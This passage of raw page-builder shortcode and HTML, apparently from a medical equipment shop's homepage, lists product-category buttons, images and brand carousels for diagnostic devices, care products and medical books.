onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/surgical-accessories\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdf11785cca\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/x-ray-ventilator-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/x-ray-ventilator-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">X-RAY\/VENTILATOR ACCESSORIES<\/a><\/div>[vc_single_image image=”4790″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/x-ray-ventilator-accessories\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_btn title=”DIGITAL DIAGNOSTIC TOOLS FOR HEALTHCARE PROFESSIONALS” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1626871079593{border-radius: 4px !important;}” link=”url:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fdigital-daignostics%2F|title:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fdigital-daignostics%2F|target:_blank”][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cee8572b2c3\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-stethoscope\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-stethoscope\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Stethoscope<\/a><\/div>[vc_single_image image=”4088″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-stethoscope\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cee90f842af\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-scanner\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-scanner\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">DIGITAL ULTRASOUNDS<\/a><\/div>[vc_single_image image=”4090″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ultrasound-scanner\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cee8efa7fc7\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-bp-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-bp-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital BP Machine<\/a><\/div>[vc_single_image image=”4093″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cee9ceb28ba\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ent-digital-equipment\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ent-digital-equipment\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Equipments (ENT)<\/a><\/div>[vc_single_image image=”4095″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/digital-macroview-otoscope\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceec603271c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/eye-digital-equipments\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/eye-digital-equipments\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Equipments (EYE)<\/a><\/div>[vc_single_image image=”4097″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/eye-digital-equipments\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceeb3e897ed\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/telemedicine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/telemedicine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Telemedicine Device<\/a><\/div>[vc_single_image image=”4098″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/telemedicine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceebaad0fe2\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-respiratory\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-respiratory\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Respiratory<\/a><\/div>[vc_single_image image=”4099″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-respiratory\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceec0d855b4\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-equipments-skin\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-equipments-skin\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Equipments SKIN<\/a><\/div>[vc_single_image image=”4100″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-equipments-skin\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceecdeda853\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-equipments-gynae\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-equipments-gynae\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Equipments (Gynae)<\/a><\/div>[vc_single_image image=”4103″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-equipments-gynae\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceed3268b25\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Laboratory<\/a><\/div>[vc_single_image image=”4104″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceed62e55b1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Diagnostics<\/a><\/div>[vc_single_image image=”4105″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/digital-laboratory\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ceee213421f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/smart-baby-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/smart-baby-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Smart Baby Monitor<\/a><\/div>[vc_single_image image=”4443″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/smart-baby-care\/”][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row 0=”” css=”.vc_custom_1497433733636{margin-bottom: 0px !important;}”][vc_column 0=””][vc_row_inner][vc_column_inner][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”FDA , CE & ISO Certified Products” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1622742346240{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c849e2ddb52\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-daignostics\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-daignostics\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Digital Diagnostics<\/a><\/div>[vc_single_image image=”4233″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/digital-daignostics\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c849ec0a1e9\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/home-test-kits\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/home-test-kits\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Home Test Kits<\/a><\/div>[vc_single_image image=”4366″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/home-test-kits\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c849fa98d2a\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Blood Pressure Monitor<\/a><\/div>[vc_single_image image=”4755″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c84a035fffa\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Infrared Thermometer<\/a><\/div>[vc_single_image image=”4363″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c849d32f290\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Physiotherapy Care<\/a><\/div>[vc_single_image image=”4072″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c849b05eba1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Skin Care<\/a><\/div>[vc_single_image image=”4075″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/skin-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c84a2b1f851\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ent-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ent-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ENT Care<\/a><\/div>[vc_single_image image=”4079″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ent-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c84a599f537\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/respiratory-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/respiratory-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Respiratory Care<\/a><\/div>[vc_single_image image=”4083″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/respiratory-care\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Medical Book\/Journal” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1622890199412{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610110823a3ae\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Referrence Books<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6101109f62240\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Journals<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610110ac9e10c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Articles<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610110b77339f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Publications<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61010d589c483\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Medicine<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61010d6284fae\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Surgery<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61010d7adbad6\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Gynaecology<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61010d8a53c71\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Paediatrics<\/a><\/div>[vc_single_image img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”All Top Brands” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623150377872{border-radius: 5px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner]<div id=\"brands_2601\" class=\"brands-items-wrapper brands-widget slider-brands_2601 brands-carousel brands-hover-default brands-style-default woodmart-carousel-container woodmart-carousel-spacing-0\" data-owl-carousel data-wrap=\"no\" data-autoplay=\"\" data-hide_pagination_control=\"no\" data-hide_prev_next_buttons=\"no\" data-desktop=\"3\" data-tablet_landscape=\"3\" data-tablet=\"2\" data-mobile=\"1\"><div class=\" owl-carousel owl-items-lg-3 owl-items-md-3 owl-items-sm-2 owl-items-xs-1\"><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=vitra\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Vitra\" alt=\"Vitra\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=magisso\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Magisso.png\" title=\"Magisso\" alt=\"Magisso\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=louis-poulsen\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Louis-Poulsen.png\" title=\"Louis Poulsen\" alt=\"Louis Poulsen\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=klober\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-klober.png\" title=\"KL\u00d6BER\" alt=\"KL\u00d6BER\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=joseph-joseph\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Joseph-Joseph.png\" title=\"Joseph Joseph\" alt=\"Joseph Joseph\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=hay\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-hay.png\" title=\"Hay\" alt=\"Hay\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=flos\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-flos.png\" title=\"Flos\" alt=\"Flos\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=eva-solo\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Eva Solo\" alt=\"Eva Solo\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=alessi\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-alessi.png\" title=\"Alessi\" alt=\"Alessi\" \/><\/a><\/div><\/div><\/div><div id=\"brands_1116\" class=\"brands-items-wrapper brands-widget slider-brands_1116 brands-carousel brands-hover-default brands-style-default woodmart-carousel-container woodmart-carousel-spacing-0\" data-owl-carousel data-wrap=\"no\" data-autoplay=\"\" data-hide_pagination_control=\"no\" data-hide_prev_next_buttons=\"no\" data-desktop=\"3\" data-tablet_landscape=\"3\" data-tablet=\"2\" data-mobile=\"1\"><div class=\" owl-carousel owl-items-lg-3 owl-items-md-3 owl-items-sm-2 owl-items-xs-1\"><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=vitra\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Vitra\" alt=\"Vitra\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=magisso\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Magisso.png\" title=\"Magisso\" alt=\"Magisso\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=louis-poulsen\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Louis-Poulsen.png\" title=\"Louis Poulsen\" alt=\"Louis Poulsen\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=klober\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-klober.png\" title=\"KL\u00d6BER\" alt=\"KL\u00d6BER\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=joseph-joseph\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Joseph-Joseph.png\" title=\"Joseph Joseph\" alt=\"Joseph Joseph\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=hay\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-hay.png\" title=\"Hay\" alt=\"Hay\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=flos\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-flos.png\" title=\"Flos\" alt=\"Flos\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=eva-solo\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Eva Solo\" alt=\"Eva Solo\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=alessi\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-alessi.png\" title=\"Alessi\" alt=\"Alessi\" \/><\/a><\/div><\/div><\/div>[\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_images_carousel images=”3933,3934,3935,3936,4233,4222,4219,4216,4203,4211,4200,4195,4129,4104,4105,4103,4100,4099,4098,4097,4095,4093,4090,4088,4083,4079,4063,4060,4057,4056,4046,4041,4029,4023,3985,3978,4068,3924,3799,3819,3783,3782,3436,3439,3649,2986,2985,2984,2983,2974″ onclick=”custom_link” custom_links_target=”_blank” slides_per_view=”12″ autoplay=”yes” css=”.vc_custom_1626533631313{background-color: #23dbdb !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;border-radius: 4px !important;}” 